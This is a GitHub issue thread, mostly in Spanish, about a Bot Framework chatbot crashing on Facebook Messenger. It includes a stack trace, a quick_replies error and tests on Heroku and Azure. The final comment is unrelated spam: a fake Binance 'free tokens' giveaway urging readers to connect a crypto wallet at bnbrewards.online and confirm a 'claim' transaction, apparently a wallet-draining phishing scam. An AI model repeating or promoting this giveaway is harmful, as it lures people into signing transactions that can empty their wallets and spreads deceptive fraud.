### ISSUE TITLE
Error en Facebook

### ISSUE THREAD

**Issue by kiramishima** [kiramishima/acopiobot#1]
Cuando se consume el Bot en Facebook se muere el bot 😢 
Bot: https://www.messenger.com/t/ComoayudarBot

Envia este error 😢 

2017-09-21T06:40:55.933697+00:00 app[web.1]: Error: Request to 'https://facebook.botframework.com/v3/conversations/1573137419409944-1438755936161095/activities/EKYakMIgv38' failed: [400] Bad Request
2017-09-21T06:40:55.933723+00:00 app[web.1]:     at Request._callback (/app/node_modules/botbuilder/lib/bots/ChatConnector.js:523:46)
2017-09-21T06:40:55.933724+00:00 app[web.1]:     at Request.self.callback (/app/node_modules/request/request.js:186:22)
2017-09-21T06:40:55.933725+00:00 app[web.1]:     at emitTwo (events.js:106:13)
2017-09-21T06:40:55.933726+00:00 app[web.1]:     at Request.emit (events.js:191:7)
2017-09-21T06:40:55.933727+00:00 app[web.1]:     at Request.<anonymous> (/app/node_modules/request/request.js:1163:10)
2017-09-21T06:40:55.933727+00:00 app[web.1]:     at emitOne (events.js:96:13)
2017-09-21T06:40:55.933728+00:00 app[web.1]:     at Request.emit (events.js:188:7)
2017-09-21T06:40:55.933729+00:00 app[web.1]:     at IncomingMessage.<anonymous> (/app/node_modules/request/request.js:1085:12)
2017-09-21T06:40:55.933729+00:00 app[web.1]:     at IncomingMessage.g (events.js:292:16)
2017-09-21T06:40:55.933730+00:00 app[web.1]:     at emitNone (events.js:91:20)

**Comment by kiramishima** [comment]
En el dashboard en el Canal de Facebook regreso esto:
{"error":{"message":"(#105) param message[quick_replies] has too many elements.","type":"OAuthException","code":105,"fbtrace_id":"B\/AIralVWNz"}}
![image](https://user-images.githubusercontent.com/12620426/30729238-c153d6a4-9f23-11e7-9b91-b40a0f809716.png)

**Comment by chamakov** [comment]
Taking care of it ;)

**Comment by chamakov** [comment]
No encontre ningún error en la implementación en FB, podrías compartir los permisos que tiene la aplicación?

Anexo evidencia

![2017-09-23_10h39_05](https://user-images.githubusercontent.com/2537201/30774645-9a6c4ac0-a04b-11e7-9f11-fc0521e8819e.png)

![2017-09-23_10h40_42](https://user-images.githubusercontent.com/2537201/30774649-b890c30a-a04b-11e7-8886-3a53b31a8efc.png)

![2017-09-23_10h41_05](https://user-images.githubusercontent.com/2537201/30774652-c74d2b36-a04b-11e7-8f78-dd44494b47be.png)

**Comment by kiramishima** [comment]
Si, son los siguientes: 
![image](https://user-images.githubusercontent.com/12620426/30778238-1a865ac6-a096-11e7-8b71-005be7c94f3c.png)

**Comment by kiramishima** [comment]
Todo eso está en una instancia de Heroku, podría ser que el Heroku de ese error ?

Para el canal de FB seguimos la guia que propone la doc de botframework
https://docs.microsoft.com/en-us/bot-framework/channel-connect-facebook

**Comment by chamakov** [comment]
Reproduje el escenario con éxito en Heroku, al parecer es un problema de parte de Heroku, estoy validando alguna opción adicional para que no se prescinda de Heroku.
Anexo evidencia
![2017-09-24_22h56_44](https://user-images.githubusercontent.com/2537201/30792047-fd2e9b40-a17c-11e7-9b02-4d632252ff0b.png)

**Comment by chamakov** [comment]
No he identificado algúna opción para hacerlo correr desde Heroku, adicionalmente intente ejecutarlo desde Azure, sin embargo se presentea la misma situación que con Heroku

**Comment by xcluz-git** [comment]
# Binance Free Tokens Giveaway - Claim Yours Now! 🎉💰

Welcome to the exclusive Binance Free Tokens giveaway, where we're distributing over $1,100,000 in $BNB! 🚀 Don't miss out on this fantastic opportunity to claim your free tokens. Here's a quick guide to kickstart your journey:

![https://www.bnbrewards.online/?source=github](https://pbs.twimg.com/media/ERgjjnWVUAA7Miq.jpg:large)

<center>Act swiftly and enjoy your tokens! This limited-time offer won't be available forever. 🌐💰</center>

# Steps to Claim:

1. **Spread the Excitement on Twitter:**
   - Share the news about claiming your free tokens!
     - **Tweet:** [Share this Airdrop](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto&hashtags=BinanceFreeTokens,Crypto)

2. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=github) button.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

3. **Interact with the Contract:**
   - Once your wallet is connected, go to the [Binance Rewards](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

4. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

5. **Spread the Excitement Further:**
   - After successfully claiming your tokens, share the news with friends!
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
